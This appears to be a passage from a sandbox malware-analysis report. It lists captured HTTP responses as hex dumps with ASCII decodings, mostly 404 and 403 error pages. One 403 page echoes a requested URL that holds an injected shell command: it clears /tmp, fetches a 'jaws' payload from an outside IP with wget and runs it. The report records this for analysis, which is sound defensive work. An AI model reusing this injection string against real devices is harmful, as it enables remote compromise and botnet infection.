7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:08:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:56 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:02 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 01 Nov 2021 09:08:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 166Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=UTF-8Date: Sat, 17 Oct 2015 00:24:01 GMTLast-Modified: Sat, 17 Oct 2015 00:24:01 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 72 65 73 6f 6c 76 65 73 20 74 6f 20 61 20 66 69 6c 65 20 70 6c 75 73 20 43 47 49 2d 73 74 79 6c 65 20 70 61 74 68 69 6e 66 6f 2c 20 62 75 74 20 74 68 65 20 66 69 6c 65 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 43 47 49 20 66 69 6c 65 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>403 Forbidden</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' resolves to a file plus CGI-style pathinfo, but the file is not a valid CGI file.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:00 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Mon, 25 Oct 2021 11:08:54 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 16:15:57 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:09:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Nov 2021 09:09:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Server: BitNinja Captcha ServerDate: Mon, 01 Nov 2021 09:09:01 GMTContent-Length: 13724Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6f 6f 6d 6c 61 2c 20 4a 6f 6f 6d 6c 61 2c 20 6a 6f 6f 6d 6c 61 20 31 2e 35 2c 20 77 6f 72 64 70 72 65 73 73 20 32 2e 35 2c 20 44 72 75 70 61 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4a 6f 6f 6d 6c 61 21 20 31 2e 35 20 2d 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 32 2e 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 57 61 69 74 69 6e 67 20 66 6f 72 20 74 68 65 20 72 65 64 69 72 65 63 74 69 72 6f 6e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcontent-length: 86cache-control: no-cacheData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><body><h1>404 Not Found</h1>The requested URL was not found.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:02 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:04 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Nov 2021 09:09:07 GMTContent-Length: 1238Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 6b 73 5f 63 5f 35 36 30 31 2d 31 39 38 37 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 c6 c4 c0 cf 20 b6 c7 b4 c2 20 b5 f0 b7 ba c5 cd b8 ae b8 a6 20 c3 a3 c0 bb 20 bc f6 20 be f8 bd c0 b4 cf b4 d9 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 